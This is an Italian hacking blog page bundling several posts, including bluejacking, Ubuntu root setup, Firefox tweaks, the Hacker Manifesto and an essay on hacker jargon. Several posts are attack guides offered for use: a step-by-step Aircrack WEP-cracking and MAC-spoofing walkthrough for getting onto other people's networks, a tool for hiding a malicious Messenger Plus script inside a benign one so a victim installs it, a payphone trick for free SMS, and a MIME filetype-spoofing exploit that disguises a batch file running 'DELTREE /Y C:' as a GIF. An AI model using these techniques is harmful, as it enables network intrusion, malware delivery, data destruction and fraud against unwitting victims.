DISCLAIMER!

Le informazioni (e i download, quindi tutti i file contenuti nel blog) da me divulgate sono da ritenersi a puro scopo informativo e di studio. Non mi assumo nessuna responsabilità riguardante l'uso improprio e/o illecito delle tecniche e dei programmi qui descritti e di tutti i danni a cose e persone e/o perdite di guadagni che ne possano derivare. Il blog non vuole istigare nessuno a delinquere o a commettere reati. Le tecniche qui descritte sono da utilizzare a proprio rischio e pericolo.

Traduci Il Blog In




Cerca in Xthreme Hacking!

Bluejacking


Il bluejacking, whats??!
Il bluejacking??! E’ una tecnica nata in Inghilterra e che sta avendo sempre maggiore interesse da parte di coloro che usufruiscono del Telefonino. Tramite questa tecnica è possibile controllare dall’esterno un telefonino con il bluetooth acceso e quindi visualzizzarne i messaggi o addirittura mandarglieli senza pagare niente.
Il nome “bluejacking” prende il nome dal termine “bluetooth” e “hiijacking” che significa dirottare.
Dove posso trovare maggiori informazioni di questa tecnica?
Talmente che si è diffusa questa tecnica , in Inghilterra hanno pensato addirittura di farne un sito che troverete a questo indirizzo:
http://www.bluejackq.com/
In questo sito ci sono tutte le ultime novità e l’elenco dei siti vulnerabili , vale la pena visitarlo .
Esistono delle persone che fanno questo ?
Certo , coloro che usano le tecniche di bluejacking si chiamano Bluejacker che non lo fa per violare la privacy delle persone , ma solamente per divertirsi ; in generale il bluejacker è innocuo.
Quali sono i programmi da loro usati?
Generalmente i programmi più diffusi sono i seguenti :
-SMan
-Mobiluck
-Freejack
-MeetingPoint
-ProximityMail

Crackare Reti WIreless


Avete un pc portatile con scheda wi-fi ? Siete in giro , magari in un gran centro abitato (o se siete fortunati ne basta uno piccolo..) e non sapete da dove connettervi ?

Oppure semplicemente non volete pagare la connessione ? xD

Si può..e in pochissimi minuti… RICORDO CHE SI TRATTA SOLAMENTE DI UNA GUIDA, SCROCCARE LA CONNESSIONE AGLI ALTRI E’ REATO.

Se trovate una rete non protetta..ok potete connettervi senza alcun problema..ma quando vi trovate davanti ad una rete protetta in wep o wpa ? Siete un po nella cacca vero?! Gia... quindi continuate a leggere...

Il 20 gennaio 2007 è stata rilasciata una nuova versione di Aircrack. Supportato da diversi sistemi operativi, si tratta di uno dei migliori tools per il wireless craking ed il wardriving. Se state utilizzando Linux potete seguire le istruzioni del sito Wireless Defence (anche se in inglese risulta intuitivo seguire tutti passaggi grazie alle varie immagini a supporto della documentazione). Se invece state utilizzando Windows, potete leggervi questo articolo (tratto per buona parte da Taz Forum).

Presupposti:
- Musica!
- Avere una dispensa pienza zeppa di merendine
- Sapere installare un programma
- Scaricate ed installate Aircrack
- Se utilizzate “Winaircrack” (Aircrack con interfaccia grafica) copiate i files peek.dll e peek5.sys all’interno della cartella di Aircrack
- Eseguiremo l’applicazione dal prompt di DOS: per poter eseguire il programma anche se non siamo nella directory che lo contiene, cliccate col tasto destro del mouse su “Risorse del computer, Proprietà, Avanzate, Variabili d’ambiente, Modifica” portatevi alla fine della linea su cui sono già scritte altre variabili d’ambiente, inserite un punto e virgola (“;”) e scrivete il percorso in cui si trova il programma Aircrack (es. C:\Documents and Settings\2BFree\Desktop\aircrack-ng-0.3-win\aircrack-ng-0.3-win\bin)
- Avrete anche bisogno di installare dei nuovi driver per il vostro adattatore di rete: i driver originali non sono stati pensati per fare cose simili (per trovare dei driver che possano fare al caso vostro visitate il sito WildPacket)
- Per installare i nuovi driver aprite “clic destro su Risorse del Computer, Proprietà, Gestione Periferiche, clic destro sul vostro adattatore di rete, Proprietà, Driver, Aggiorna Driver, Installa da un elenco o percorso specifico” scegliete il percorso in cui avete scaricato i driver. Assicuratevi infine che il vostro adattatore di rete sia ora compatibile col tutto
Per facilitarvi la comprensione, durante i vari passi di questo tutorial fate riferimento al diagramma di flusso presente sul sito Wireless Defence. Se non avete confidenza con i “MAC Address” allora, prima di proseguire, leggetevi anche il relativo articolo: http://2befree.wordpress.com/2007/02/03/mac-address/.

Il primo passo è ovviamente quello di trovare una rete wireless . Potete andarvene in giro col vostro computer portatile a fare del wardriving oppure potete utilizzare una apposita chiavetta “Wi-fi Finder”.

Digitate “Airodump” nel prompt di DOS (Start, esegui, cmd). Vi comparirà una finestra contenete le schede di rete trovate sulla vostra macchina. Notate che accanto al nome delle schede di rete è presente un numero identificativo. Ad esempio:
14 NETGEAR WG511T 54 Mbps Wireless PC Card
22 NETGEAR WAG511 802.11a/b/g Dual Band Wireless PC Card
In questo caso digitate 22, il numero identificativo della scheda che ci interessa utilizzare (in genere è quella che riporta una qualche identificazione del tipo “802.11x”).

Ora vi viene chiesto di indicare il chipset utilizzato dal vostro adattatore di rete. Ad esempio:
Interface types: ‘o’ = HermesI/Realtek
‘a’ = Aironet/Atheros
Selezionate il vostro, in questo caso scegliendo “o” oppure “a”. Per sapere quale chipset è montato sulla vostra scheda di rete potete dare uno sguardo al sito: http://www.linux-wlan.org/docs/wlan_adapters.html.gz

Ora vi sarà richiesto di inserire il numero del canale da controllare (sniffing). In genere per gli USA e l’UK utilizzate l’11, per l’Europa il 14. Se volete fare una scansione di tutti i canali utilizzate lo zero.

In seguito il programma chiederà di digitare il nome da dare al file che verrà creato a partire dalla scansione del canale. Digitate il nome che vi pare, ad esempio “WEP1”.

Ora Aircrack vi chiederà se salvare gli interi pacchetti catturati o soltanto gli IV. Per craccare una chiave WEP vi basta salvare semplicemente gli IV (il che vi farà risparmiare diverso spazio sull’hard disk, quindi digitate “y”).

BSSID = l’indirizzo MAC dell’Access Point
PWR = indica la forza del segnale che si sta ricevendo
BEACONS = sono pacchetti “in chiaro” che l’Access Point trasmette sostanzialmente per dire “sono un access point, collegati a me”
DATA = è quello che ci interessa: sono gli IV che Aircrack utilizzerà per trovare
la password WEP
ENC = il tipo di incapsulamento: WEP, WPA, OPEN…
ESSID = Il nome della rete Wireless. L’SSID è una sorta di identificativo della rete. Se ad esempio l’Access Point ha come SSID il nome “pippo” allora le schede wireless che ci si vogliono connettere devono impostare a loro volta come SSID “pippo”.

Nella seconda parte dell’immagine sopra vediamo i vari client che stanno “dialogando” con l’Access Point”, più esattamente vediamo i vari indirizzi MAC dei client. Quest’informazione può risultare utile in seguito quindi annotatevi gli indirizzi MAC. Questo perché in un Access Point è possibile impostare un filtro di indirizzi MAC: in questo modo soltanto le schede di rete che hanno un indirizzo MAC riportato nel filtro potranno collegarsi. Ciò significa che anche se possediamo la chiave WEP non possiamo accedere all’Access Point a meno che l’indirizzo MAC del nostro adattatore di rete non sia stato impostato nel filtro dell’Access Point. Ad ogni modo un caso simile sarà trattato dopo, per il momento non preoccupiamocene.

Aicrack continuerà a collezionare IV finché non lo fermate. Più IV scaricate e più probabilità avete di decifrare la chiave. Non c’è un riferimento esatto del tipo “lunghezza chiave = tot numero di IV da scaricare”. In linea generale prendete per buono che per trovare una chiave WEP da 40 bit potete scaricare dai 250.000 ai 400.000 IV: Aircrack dovrebbe trovare la chiave in pochi secondi. Ad ogni modo vi conviene cominciare con pochi IV infatti, se questi non bastano ad Aircrack per trovare
la chiave WEP, non dovrete ricominciare tutto da zero: basterà che quando vi verrà chiesto il nome che volete dare al file inseriate lo stesso nome che avevate già utilizzato in precedenza (in tal modo il file non verrà sovrascritto ma verrà invece “continuato”, cioè incrementato). Per una chiave da 104 bit collezionate circa 2.000.000 di IV: a volte ne bastano molti meno (anche se il programma impiegherà più tempo per trovare la chiave), altre volte purtroppo dovrete scaricarne di più…
Quando sarete soddisfatti del numero di IV collezionati premete “CTRL + C” per fermare il programma.

Scrivendo “Aircrack-ng” nel prompt vi verrà mostrata la lista dei parametri che è possibile utilizzare. Supponiamo di aver scaricato intorno ai 400.000 IV, in genere sufficienti per scovare una chiave WEP da 40 bit. Digitiamo allora il comando “aircrack-ng -n 64 WEP1.ivs”. Con il parametro “-n 64” diciamo al programma che la chiave ha una lunghezza massima di 64 bit e di non provare quindi oltre (anche perché, come già ricordato, non abbiamo ancora scaricato abbastanza IV per lunghezze di chiave maggiori). Il parametro “-f” che in questo esempio non abbiamo utilizzato serve per specificare l’intensità dell’attacco brute-force che di default è a livello 2: volendo potete specificare un livello maggiore, ad esempio 5.
Da notare anche l’estensione del file (WEP1.ivs): sarà *.ivs se avevate deciso di salvare soltanto gli IV, sarà *.cap se avevate deciso di salvare gli interi pacchetti catturati.

Se avrete fortuna il programma vi restituirà un messaggio di “KEY FOUND” seguito dal nome della chiave.

Ora che avete la chiave utilizzatela proprio come se doveste connettervi ad una vostra rete “domestica”. Se l’SSID dell’Access Point è abilitato seguite questa spiegazione; in caso contrario vi rimando all’ultimo paragrafo di questa guida.
Start, Connetti a, Connessioni di rete senza fili, Visualizza reti senza fili disponibili. Se l’SSID è abilitato (è visibile), questo vi appare nella finestra delle connessioni disponibili (e in genere potete anche vedere se utilizza il WPA o meno come sistema di cifratura). Fate doppio clic sull’icona della connessione ed inserite la password che avete trovato in precedenza: è fatta. Se non riuscite a collegarvi la causa può essere:
1) L’access Point utilizza un filtro per indirizzi MAC
2) Siete troppo lontani dall’Access Point
3) La chiave che avete trovato è errata
1) L’AP utilizza un filtro per indirizzi MAC. In precedenza vi era stato detto di annotarvi gli indirizzi MAC che stavano dialogando con l’AP. Ora la cosa più semplice da fare è:
- Aspettare che uno degli indirizzi MAC annotati in precedenza si scolleghi
- Cambiare il nostro indirizzo MAC in modo da renderlo uguale a quello che si è appena scollegato (MAC Spoofing)
- Entrare nell’Access Point .

2) Siete troppo lontani dall’Access Point. Bisogno di spiegazioni??? Avvicinatevi…

3) La chiave che avete trovato è errata. O meglio… è possibile che sia corretta: assicuratevi di averla scritta in modo giusto. In particolar modo assicuratevi di non aver scritto eventuali zeri (“0”) come delle “O” in quanto non ci possono essere delle “O”!

Se l’SSID dell’Access Point è disabilitato nessun problema. Voi conoscete già qual è, vi è stato rivelato da Aircrack: vedi immagine sopra, ESSID. Quello che dovete fare è semplicemente inserire l’SSID trovato nelle impostazioni di connessione.
Start, Connetti a, Connessioni di rete senza fili, Visualizza reti senza fili disponibili, Modifica impostazioni avanzate, Reti senza fili, Aggiungi: scrivete l’SSID così come lo ha trovato Aircrack, l’autenticazione alla rete è normalmente APERTA > scegliere la cifratura WEP, togliere il segno di spunta dalla voce “la chiave sarà fornita automaticamente” ed inserire invece la chiave WEP che avete trovato grazie ad Aircrack (nota: inserite la chiave tutta di seguito, senza i due punti (“:”) di separazione).

Divenatre Admin in Ubuntu


Prima di tutto apriamo il terminale, quindi:
Applicazioni > Accessori > Terminale

Vi si aprirà il terminale, quindi dovete digitare questo:

CODICE
sudo passwd root

Questo codice vi servirà per creare e dare una password all'utente amministratore...
Dovrete inserire prima la vostra password e poi la password che intendete dare a root... per due volte...

L'utente root (questa situazione è utile se dovete digitare tanti comandi che per usarli bisogna scrivere "sudo" nel terminale)basta fare così:

1:Avvia il terminale
2:Digitiamo sudo su
3:Digitiamo la password e premiamo invio
4:Il terminale sarà utilizzabile come se noi fossimo Root!.

Attenzione: con questa procedura sarete root del sistema solo da terminale. Per accedere come root del sistema dovete eseguire questa operazione:
applicazioni> sistema> finestra di accesso> sicurezza. Cercate la scritta "consentire l'accesso locale dell'amministratore" e spuntate. Ora riavviate il pc.
Quando vi chiederà i dati d'accesso digitate root nello spazio login e nella password, la password che avete impostato prima con la procedura sudo passwd root.

Curiosita: sudo sta per Super Utente do

Velocizzare Firefox!


Se volete ottimizzare ed incrementare così la velocità di FireFox eseguite tutti i passaggi sottostanti:
1. Mantenendo aperta questa finestra, usando la tastiera premete i tasti control+n si aprirà una nuova finestra: sulla barra degli indirizzi della nuova finestra scrivete “about:config” e premete invio da tastiera, riducete ed affiancate le finestre di Firefox ora aperte in modo da vederle tutte e due contemporaneamente, così facendo potrete effettuare comodamente le modifiche indicate qui sotto :
2. Cercate queste opzioni (per filtrare cio’ che dobbiamo modificare scrivete parte del nome nella riga filtro) e cambiatele (cliccando su ogni singola riga da modificare) in:
browser.turbo.enabled: true -> se non esiste createla: tasto destro del mouse, nuovo valore booleano
network.dns.disableIPv6: true
network.http.max-connections: 48
network.http.max-connections-per-server: 24
network.http.max-persistent-connections-per-proxy: 12
network.http.max-persistent-connections-per-server: 6
network.http.pipelining.firstrequest: true
network.http.pipelining: true
network.http.pipelining.maxrequests: 30
network.http.proxy.pipelining: true

Impostare il valore di network.http.pipelining.maxrequests a 32 renderà molto veloce FireFox ma potreste venire “bannati” ovvero esclusi da qualche server. Ciò accadrà nel caso in cui il server a cui vi collegherete interpreti questo alto numero di connessioni contemporanee come un attacco di tipo flood. Se avete paura che ciò accada impostate network.http.pipelining.maxrequests a 8.
3. Cliccate sul bottone destro del mouse e selezionate Nuovo -> Intero.
Impostate il nome di questo nuovo parametro come:
nglayout.initialpaint.delay“.
Impostate il suo valore a 0 (zero).
4. Diminuire l’occupazione della memoria ram
a) Create un nuovo valore booleano:
config.trim_on_minimize ed imponete il suo valore a true esso riduce l’occupazione di 20 MB – 30 MB
b) impostate browser.cache.memory.capacity ad una dimensione fissa ovvero:
Se possedete 256 MB RAM -> 14336, 512 MB RAM -> 22528, 1 GB RAM -> 32768
c) Impostate browser.sessionhistory.max_total_viewers a 0
d) Impostate browser.sessionhistory.max_entries a 5
Dal Menu -> Strumenti -> Opzioni
* Impostate la cache su disco ad un valore basso (minore di 50 MB ad esempio 8).
* Disabilitate Java se solitamente non lo usate
* Evitate estensioni avide di memoria. Non usatene più di 5. Disinstallate quelle che non usate per nulla.
* Pulite lo storico dei files scaricati e non lasciate che si accumulino. Questo avrà impatto sulle performance.
5. Chiudete FireFox e riavviatelo, godendo così di maggior efficienza.
6. Le pagine di alcuni siti potrebbero venir presentate in modo non corretto. Se volete ripristinate il tutto alla situazione originale cliccate con il pulsante destro sui singoli parametri modificati che vedrete in grassetto e scegliendo Azzera.
7. Blocchiamo la pubblicità con l’estensione Adblock Plus aggiornando i filtri predisposti da Adblock Filterset Updater
8. Per precaricare e mantenere in memoria Firefox in modo da velocizzare l’avvio usiamo Firefox Preloader
In ultimo vi consigliamo anche qualche estensione che noi troviamo comoda: se decidete di installarle installatene una alla volta e dopo ogni singola installazione riavviate Firefox completamente.
9. Se usate windows aggiungete l addons IETab e permette di scaricare aggiornamenti da siti microsoft con firefox

Unire 2 script MNS Plus!


Sempre più spesso il nostro caro MSN viene sfruttato per i più stravaganti attacchi informatici…
Infatti creare script per l’addon Messenger Plus è veramente facile è il prodotto risultante è estremamente potente…
Il problema più grosso è quello di riuscire a fare installare alla nostra vittima il nostro script maligno…
Come fare? Nascondendolo in un altro script!
Ecco quindi questo potente strumento, in grado di unire uno script maligno con uno falso e aggiungere un’utile funzione: impedire o meglio rendere molto difficile la sua rimozione o disattivazione.
Il funzionamento è tutto spiegato nella guida allegata:
Questo tool permette di unire uno script maligno che necessita di non essere
scoperto con uno script innocuo e dalla vera utilità.

Download: http://www.mediafire.com/?1ym4neommmi
Istruzioni:

1) Premere il primo pulsante e scegliere lo script innocuo
2) Premere il secondo pulsante e scegliere lo script maligno
3) Spuntare la casellina se si vuole aggiungere al proprio script una funzione
che rende molto difficile la cancellazione e l’eleminazione dello script stesso
4) Scegliere il nome del file che avrà lo script finale
5) Premere Unisci
6) Lo script risultante verrà creato nella stessa cartella del programma

Attenzione:
1)Lo script maligno può contenere contenere solo funzioni personali o inizianti
con “OnEvent”.
2)Funzioni inizianti con “OnGetScript” o “OnWindowidEvent” non devono
essere contenute nello script maligno.
3)In caso di file e/o cartelle presenti in entrambi gli script i file ononimi dello
script falso sovrascrivono quelli dello script maligno.
4)In nessuno dei due script devono essere presenti:
un file con nome “inizpdt.js”; una cartella con nome “a” (quest’ultima può
invece essere presente nel caso non si selezioni la funzione per rendere
difficile/imossibile l’eleminazione dello script).
Script by Suxsem

Fregare Cabine Telecom


Occorrente:
-Tempo
-Palle
-Calma
-10 cent

Cominciamo!
Introdurre 10 cents nella cabina (alcune li accettano altre no).
Dopo di che selezionare la modalità sms,, e iniziate a scrivere un messaggio. Per prova inviate il primo sms al vostro cellulare,, scrivete qualcosa ed inviatevelo, attenzione mentre invia il messaggio,, telefono dovete sapere che manda segnali analogici,, tipo il modem
per intenderci,, quando riceve e manda un fax e/o si connette alla rete…
Ho fatto alcune prove acustiche col Sirio che ho a casa,, e dal vivavoce si sentono dei segnali:
il primo segnale è di solito per il testo del messaggio e il destinatario, il secondo è l’addebito del messaggio.
Caso strano, non so perchè ma mi è capitato di alzare la cornetta per sentire che rumore faceva e…
VOILA’!
Cabina impallata… sullo schermo esce un messaggio del genere: “Temporaneamente Fuori Servizio”
Ho ritentato una seconda volta su una cabina affianco,, ma questa volta invece di alzare solamente la cornetta una volta ho chiuso ed
aperto fino all’impallo… Sempre la stessa procedura!
Fino a qui che abbiamo visto? Solo il gusto di impallare la cabina, ma niente in cambio! ERRORE! Un paio di secondi dopo l’impallo il
display diventa vuoto, si riempe tipo come il NOKIA all’accensione e subito dopo il fatidico “Fuori Servizio” seguito da un simpatico
rumore di monetina che provvederà a ritornare nelle tasche del proprietario.
In parole povere ho trovato il modo come fottere gli sms alla
Telecom…
Molto Importante: Non scappate davanti all’impallamento anche se ci sono i polizziotti… Non scatta nessun allarme e da quanto ho capito credo che faccia dei test in locale.
Potrete ripetere l’operazione quanto volete fino a quando dopo il “Fuori Servizio” un’altra scritta più o meno cosi “Invio dati” susseguita da una sigla, allora li siete inculati… L’errore non si ripeterà più.

Manifesto Hacker - By The Mentor


The Mentor ( The Mentor's Last Words

Ne e' stato arrestato un altro oggi, e' su tutti i giornali. "Ragazzo arrestato per crimine
informatico", "Hacker arrestato dopo essersi infiltrato in una banca"...
Dannati ragazzini. Sono tutti uguali. Ma avete mai, con la vostra psicologia da due soldi e il
vostro tecno-cervello da anni 50, guardato dietro agli occhi del Hacker?
Non vi siete mai chiesti cosa abbia fatto nascere la sua passione? Quale
forza lo abbia creato, cosa puo' averlo forgiato? Io sono un hacker, entrate nel mio mondo...
Il mio e' un mondo che inizia con la scuola... Sono piu' sveglio di molti altri ragazzi, quello
che ci insegnano mi annoia... Dannato sottosviluppato. Sono tutti uguali. Io sono alle Junior
High, o alla High School. Ho ascoltato gli insegnanti spiegare per quindici volte come ridurre
una frazione. L'ho capito. "No, Ms. Smith, io non mostro il mio lavoro. E' tutto nella mia
testa..."
Dannato bambino. Probabilmente lo ha copiato. Sono tutti uguali. Ho fatto una scoperta oggi. Ho
trovato un computer. Aspetta un momento, questo e' incredibile! Fa esattamente quello che
voglio.
Se commetto un errore, e' perche' io ho sbagliato, non perche' io non gli piaccio... O perche'
si senta minacciato da me... O perche' pensi che io sia un coglione... O perche' non gli piace
insegnare e vorrebbe essere da un'altra parte... Dannato bambino. Tutto quello che fa e'
giocare. Sono tutti uguali.
Poi e' successa una cosa...una porta si e' aperta su un mondo...correndo attraverso le linee
telefoniche come l'eroina nelle vene del tossicomane, un impulso elettronico e' stato spedito,
un rifugio dagli incompetenti di ogni giorno e' stato trovato, una tastiera e' stata scoperta.
"Questo e'...questo e' il luogo a cui appartengo..." Io conosco tutti qui...non ci siamo mai
incontrati, non abbiamo mai parlato faccia a faccia, non ho mai ascoltato le loro voci...pero'
conosco tutti.
Dannato bambino. Si e' allacciato nuovamente alla linea telefonica. Sono tutti uguali. Ci
potete scommettere il culo che siamo tutti uguali...noi siamo stati nutriti con cibo da bambini
alla scuola mentre bramavamo una bistecca... i pezzi di cibo che ci avete dato erano gia stati
masticati e senza sapore. Noi siamo stati dominati da sadici o ignorati dagli indifferenti. I
pochi che avevano qualcosa da insegnarci trovavano in noi volenterosi allievi, ma queste
persone sono come gocce d'acqua nel deserto. Ora e' questo il nostro mondo...il mondo
dell'elettrone e dello switch, la bellezza del baud. Noi facciamo uso di un servizio gia
esistente che non costerebbe nulla se non fosse controllato da approfittatori ingordi, e voi ci
chiamate criminali. Noi esploriamo...e ci chiamate criminali. Noi cerchiamo conoscenza...e ci
chiamate criminali. Noi esistiamo senza colore di pelle, nazionalita', credi religiosi e ci
chiamate criminali. Voi costruite bombe atomiche, finanziate guerre, uccidete, ingannate e
mentite e cercate di farci credere che lo fate per il nostro bene, e poi siamo noi i criminali.
Si, io sono un criminale. Il mio crimine e' la mia curiosita'. Il mio crimine e' quello che i
giurati pensano e sanno non quello che guardano. Il mio crimine e' quello di scovare qualche
vostro segreto, qualcosa che non vi fara' mai dimenticare il mio nome.
Io sono un hacker e questo e' il mio manifesto. Potete anche fermare me, ma non potete fermarci
tutti...dopo tutto, siamo tutti uguali.
The Mentor

Gli Hacker

Gli hacker condividono un linguaggio o, come loro stessi lo definiscono, un gergo comune che è il vero e proprio sedimento della cultura hacker American-English: esso costituisce perciò il mezzo privilegiato di comunicazione istituzionale di tale controcultura sia al suo interno che verso l'esterno.

Tale linguaggio, che è un sistema di segni deliberatamente opaco e allusivo, è determinante nella formazione dell'identità socio-culturale, ne è un elemento di aspettualizzazione, una sorta di marchio di unicità; è così come una finestra sulla cultura hacker che ne riflette la costante evoluzione.

Tramite Internet è possibile accedere al documento Jargon File: questo file ipertestuale, messo a disposizione per tutti gli utenti della Rete, nacque nel 1975 a Stanford e viene periodicamente aggiornato, per cui ne sono disponibili numerose versioni. E. Raymond mantiene attualmente questo File e da esso ha ricavato un libro "vero", un dizionario Hackerish-English di 1961 termini.

Il linguaggio informale tipico della cultura hacker è una potente arma di esclusione dalla comunità, ma anche di inclusione qualora sia d'ausilio come collante ideologico. Questo gergo colorito è sorprendentemente ricco di implicazioni, variazioni e sfumature sulla lingua inglese. "Parole come winnitude [la stoffa del vincente] e foo [nome simbolico che indica file, nomi o programmi] erano costanti del vocabolario hacker, scorciatoie usate da persone relativamente poco discorsive e introverse per comunicare esattamente quel che avevano in testa" (Levy 1996: 114).

Mentre il linguaggio di una cultura si dice derivi inconsciamente dal proprio ambiente e lo rifletta (per esempio l'idea che gli Esquimesi abbiano trenta parole diverse per indicare la neve), l'invenzione e la creazione linguistica di nuove espressioni è per l'hacker un gioco cosciente e divertente: essi sono consapevoli che col loro rifiuto delle comuni pratiche linguistiche stanno anche sfidando e provocando le norme e le visioni del mondo dominanti.

Il loro linguaggio è quindi un regno conflittuale dove opposte definizioni del mondo si contrappongono: l'identità linguistica si definisce come opposizionale, riflettendo cosa rigetta e nega.

In questo caso, il linguaggio non emerge inconsapevolmente dall'esperienza empirica, non riflette una mappatura oggettiva del mondo, ma è una sperimentazione spontanea e intenzionale, un laboratorio in continua e dinamica evoluzione, una sorta di continuo bricolage che non esiste solo per alienare l'outsider, ma soprattutto per esplorare nuove possibilità e opzioni rispetto al linguaggio ufficiale.

Tale linguaggio non è solo produttore di senso positivo ma implica una sfida alle convenzioni linguistiche dominanti al livello della decodifica: una rinnovata "guerriglia semiologica" (Eco 1975: 199) che vuole demitizzare e decostruire l'ideologismo implicito nel codice dell'emittente, svelare i codici culturali naturalizzati e decifrare le strategie nascoste di dominio.

Il discorso fatto dagli hacker, come anche la loro sperimentazione tecnica, è in continuo mutamento e riflette il desiderio di vedere i sistemi adattati agli ambienti dinamici della società dell'informazione: usando il loro gergo, gli hacker guidano letture del mondo verso direzioni nuove e inaspettate, testano e promuovono "percorsi di sviluppo", stili di vita alternativi intenzionalmente comunicativi e innovazioni significative nello stile popolare.

Sembra proprio che il processo generativo sottostante alla formazione di tale linguaggio abbia una logica così potente da creare parallelismi con altre sottoculture e linguaggi diversi: tale bricolage (Lévi-Strauss 1962: tr.it., 1964) coscientemente sovversivo deriva dall'incrocio e dall'appropriazione da culture giovanili precedenti, pop culture, realtà virtuale e mass media.

E' un "linguaggio instabile del cut-up" (Scelsi 1994: 253), una pratica significante che seleziona e decontestualizza segni pre-esistenti, assemblandoli e riutilizzandoli, sia come creazione di nuovi discorsi, sia come forma critica. Innanzi tutto la generazione degli hacker degli anni Novanta ha ereditato la maggior parte dell'originale gergo hacker creato al MIT negli anni Sessanta, innestando, però, su di esso dei cambiamenti.

Per esempio, ha introdotto termini mutuati dalla nuova fantascienza, soprattutto dal genere Cyberpunk, fusione di comunicazione elettronica e sottocultura punk; si è avvalsa dello stile visionario di Hakim Bey, pseudonimo di una figura misteriosa, artista d'avanguardia, guru della nuova opposizione che agisce con stile situazionista, anarchico, libertario, sempre in bilico tra avanguardia e opposizione.

I "vecchi" hacker, invece, erano stati influenzati da autori fantastici come Tolkien e Caroll, dal loro immaginario fatto di elfi, hobbit, maghi, demoni e incantesimi.

Lo stile di giocosa ribellione al dominio di un linguaggio tecnocratico permea la controcultura hacker e si riflette nell'uso frequente di giochi di parole, rime, contrazioni e ironia. Promiscuità stilistica ed eclettismo di codici, parodia, decostruzione, pastiche, collage, celebrazione della forma e dell'apparenza: questi sono, nella loro forma positiva, i mezzi linguistici esemplari di un attacco intellettuale alla cultura di massa atomizzata, passiva, indifferente che, attraverso la saturazione della tecnologia elettronica, ha raggiunto il suo zenith nell'America del dopoguerra.

L'appropriazione di materiali linguistici eterogenei, ma omologhi (Lévi-Strauss 1962: tr.it., 1964) ai valori di base degli hacker, provvede la controcultura di una struttura interna ordinata, regolare e coerente: tale unità strutturale, che unisce i partecipanti, provvede quindi il legame simbolico, l'integrazione tra valori e stili di vita del gruppo e come esso li esprima e rinforzi.

E' l'affinità, la similarità linguistica che i membri condividono che fornisce loro la particolare identità culturale e che promuove la nascita di un sentimento di identità di gruppo, comunitario: con uno stile di continua insurrezione, la controcultura hacker costruisce la celebrazione dell'Alterità, di un'identità alternativa che comunica una diversità rispetto alla cultura dominante e che provvede un'unità ideologica per l'azione collettiva.

Fregare un Ativirus [Parte 2]



Eccoci alla seconda parte dell articolo su come fregare un antivirus



IL MIME NELLE E-MAIL
Un secondo modo di realizzare lo spoofing dei tipi di files è invece molto più subdolo e meno facile da intercettare: si tratta dell’uso di intestazioni malformate nel protocollo MIME che gestisce gli allegati alle e-mail. Gli attachment in un messaggio di posta elettronica vengono codificati usando lo standard MIME con una codifica di solo testo nel caso dei file ASCII puri (TXT, BAT, HTA) oppure con la codifica “base64″ nel caso si tratti di file binari (eseguibili, immagini, file ZIP). Ecco un esempio di come vengono codificati (in forma di attachment) un file di immagine (PAMELA.GIF) e un file eseguibile (COMMAND.COM). La sezione evidenziata (box 1) nelle due definizioni di attachment è quella che definisce il tipo di files allegato e quindi anche l’applicazione da eseguire e l’associazione che deve realizzare Windows per quel file. L’inganno consiste proprio nel cambiare il campo “Content-Type” indicando magari che un file eseguibile è un’immagine. Windows (quindi Outlook Express) andrà ad associare a quel file l’icona corrispondente a ciò che indichiamo dentro la definizione MIME, quindi un attachment che magari è un programma porterà l’icona associate ai file GIF. Proviamo allora a creare una e-mail con un allegato “camuffato”: scriviamo un file di testo come quello riportato e salviamolo poi con l’estensione .EML (per renderlo una e-mail leggibile da Outlook);
MIME-Version: 1.0
From: mittente@server.com
To: destinatario@server.com
Subject: bla bla bla
Content-Type: image/gif; charset=us-ascii
Content-Transfer-Encoding: 7bit

Il file allegato è un’applicazione di tipo HTA, quindi eseguibile, tuttavia se andiamo ad aprire l’e-mail essa riporta un allegato con l’icona di un’immagine GIF proprio perche nel “Content – Type” abbiamo specificato un tipo di file diverso. l’exploit ancora non è ancora completo, perché se ora proviamo ad aprire il file allegato, questo viene associato al visualizzatore di immagini GIF di Windows e non viene più considerato un eseguibile, quindi pur volendo non potrebbe causare alcun danno. Cosa è successo? Cambiando il “Content – Type” abbiamo modificato radicalmente il tipo di file, che ora viene associato ad un’altra applicazione e quindi non è più eseguibile. Come oltrepassare questa limitazione? E’ qui che viene sfruttato un bug del MIME che consiste nel creare un “Subject” dell’e-maillungo 255 caratteri (ne uno di più, ne uno di meno!) seguito dall’estensione che vogliamo dare al file (nel caso di prima quindi “.HTA”). Se mettessimo un solo carattere in meno dei 255 previsti, l’allegato verrebbe riconosciuto come un’immagine GIF; se invece mettessimo un carattere in più l’allegato perderebbe ogni tipo di estensione e non sarebbe riconosciuto da Windows ne associato a qualche applicazione. Ecco quindi come modificare l’e-mail per realizzare il filetype spoofing;
From: mittente@server.com
To: destinatario@server.com
Subject: PAMELA.GIF + [245 spazi vuoti] + .HTA
Content-Type: image/gif; charset=us-ascii
Content-Transfer-Encoding: 7bit

L’essenziale è inserire nel ” Subject” 255 caratteri ASCll: volendo si può scrivere anche un nome fasullo per il file (PAMELA.GIF) e completare poi i caratteri che mancano con degli spazi vuoti fino ad arrivare a 255 (nel nostro caso quindi servono 245 spazi perché “PAMELA.GIF” è lungo 10 caratteri) e infine scrivere la vera estensione da assegnare al file allegato (.HTA). Il tutto ovviamente va scritto su un’unica riga;
Ecco un altro esempio che utilizza lo spoofing di un file BAT, che virtualmente può eseguire qualsiasi comando sul sistema:
From: mittente@server.com
To: destinatario@server.com
Subject: PAMELA.GIF + [245 spazi vuoti] + .BAT
Content-Type: image/gif; charset=us-ascii
Content-Transfer-Encoding: 7bit
DELTREE /Y C:
Content-Type: image/gif; name=”PAMELA.GIF”
Content-Transfer-Encoding: base64
oaMk7W8HR28u0yAIB2OfcimXz5UmiMuV025P83
…….(parte codificata in base64)
Content-Type: application/actet-stream; name=”COMMAND.COM”
Content-Transfer-Encoding: base64
TVogALsAAAC4BAAA//8AAAAAAAAAA
…….(parte codificata in base64)
ESEMPIO DI CODIFICA DEGLI ALLEGATI
Come ci difende Windows da questi attachment pericolosi? E’ vero che la falla di sicurezza può rendere ingannevoli i files e confondere gli utenti, tuttavia Windows si accorge dell’inghippo e quando l’utente clicca per aprire l’allegato, Outlook mostra un minimo di avviso, anche se però non viene menzionato il fatto che l’allegato non è un’immagine e all’interno dello stesso avviso il file viene nominato col nome fasullo, non con quello reale, proprio per il fatto che sono stati usati 255 caratteri.

Fregare Antivirus [Parte 1]


Eheh, come da titolo oggi vi mostrero i modi per cercare di fregare un antivirus, vi fa gola neh?! Oh, si vi vedo gia sbavare… pero smettetela perche se sbavate sul pc vi si sputtana… XDXD
